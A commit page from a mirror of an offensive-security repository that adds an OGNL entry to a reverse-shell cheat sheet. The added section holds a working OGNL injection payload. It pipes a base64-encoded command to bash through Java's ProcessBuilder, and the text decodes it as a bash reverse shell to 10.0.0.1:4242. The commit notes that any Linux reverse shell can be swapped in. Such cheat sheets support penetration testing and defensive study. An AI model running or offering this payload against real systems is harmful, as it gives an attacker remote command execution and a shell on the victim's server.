swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

SHELL - Reverse Shell OGNL

pull/4/head
Swissky 2024-01-12 16:25:57 +01:00
parent a696370e18
commit dc9a898d55
1 changed files with 11 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
docs/cheatsheets/shell-reverse-cheatsheet.md
View File

@ -22,6 +22,7 @@
* [Netcat BusyBox](#netcat-busybox)
* [Netcat Traditional](#netcat-traditional)
* [NodeJS](#nodejs)
* [OGNL](#ognl)
* [OpenSSL](#openssl)
* [Perl](#perl)
* [PHP](#php)
@ -389,6 +390,16 @@ or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```
### OGNL
```java
(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg== | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start())
```
With `YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjEnCg==` decoding to `bash -c 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1'`, the payload within the single quotes might be changed by any Linux-compatible reverse shell.
### Groovy
by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)